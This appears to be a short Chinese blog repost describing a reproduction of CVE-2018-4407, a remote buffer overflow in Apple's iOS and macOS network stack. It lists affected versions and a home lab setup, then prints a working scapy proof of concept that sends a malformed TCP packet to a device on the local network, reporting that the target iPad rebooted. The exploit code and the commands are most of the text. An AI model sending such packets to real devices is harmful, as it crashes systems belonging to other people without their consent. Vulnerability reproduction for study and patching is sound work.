系统漏洞

  • CVE-2018-4407(IOS缓冲区溢出漏洞复现)

    环境:用手机开启的热点,pc本一台,ipad一台 pc电脑:192.168.43.30 ipad:192.168.43.145 影响版本 Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6): 所有设备(通过安全更新2018-001修复) Apple macOS Sierra(受影响的最高版本为10.12.6): 所有设备(通过安全更新2018-005中修复) Apple OS X El Capitan及更早版本:所有设备 首先设备需要连接在同一个局域网内 然后查看你的苹果系统版本是否符合、这里是11的版本那么可以使用这个poc进行复现的 安装scapy模块 pip install scapy 执行脚本程序 python cve-2018-4407.py 最后执行成功、iPad被重启 附上poc #pip install scapy import scapy from scapy.all import * send(IP(dst=”192.168.43.145″,options=[IPOption(“A”*8)])/TCP(dport=2323, options=[(19, “1”*18),(19, “2”*18)])) 文章转载零组攻防实验室 其他文献参考: FreeBuf FreeBuf

    2018年11月1日 0 48 1